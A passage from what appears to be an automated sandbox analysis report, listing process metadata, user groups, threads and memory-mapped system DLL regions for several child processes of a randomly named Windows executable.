"c:\\windows\\syswow64\\ole32.dll") Region: id = 5800 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5801 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5802 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5803 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 152 os_tid = 0xed8 Thread: id = 193 os_tid = 0x11dc Thread: id = 205 os_tid = 0x11bc Process: id = "51" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xce90000" os_pid = "0x117c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4940 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4941 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4942 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4943 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4944 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4945 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4946 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4947 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4948 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4949 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4950 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4951 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4952 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4953 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4954 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4955 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5453 start_va = 0x440000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5454 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5455 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5456 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5457 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5458 start_va = 0x500000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5459 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5460 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5670 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5671 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5672 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5673 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 5674 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5675 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5676 start_va = 0x740000 end_va = 0x7fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5677 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5678 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5679 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5680 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 5681 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5682 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5683 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5684 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5685 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5804 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5805 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5806 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5807 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5808 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5809 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5810 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5811 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5812 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5813 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5814 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5815 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5816 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5894 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5895 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5896 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 5897 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 153 os_tid = 0x1184 Thread: id = 201 os_tid = 0x11c0 Thread: id = 206 os_tid = 0xf1c Process: id = "52" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x52695000" os_pid = "0x1190" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4969 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4970 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4971 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4972 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4973 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4974 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4975 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4976 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4977 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4978 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4979 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4980 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4981 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4982 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4983 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4984 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5508 start_va = 0x440000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5509 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5510 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5531 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5532 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5533 start_va = 0x440000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5534 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5692 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5693 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 5694 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5695 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5696 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5697 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5698 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5699 start_va = 0x710000 end_va = 0x7cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5700 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5701 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5702 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5703 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5704 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5705 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5706 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5707 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5708 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5709 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5817 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5818 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5819 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5820 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5821 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5822 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5823 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5824 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5825 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5826 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5827 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5828 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5890 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5891 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5892 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5893 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 170 os_tid = 0x1194 Thread: id = 198 os_tid = 0x11cc Thread: id = 207 os_tid = 0xb38 Process: id = "53" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xcb9a000" os_pid = "0x1198" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4991 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4992 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4993 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4994 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4995 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4996 start_va = 0x1a0000 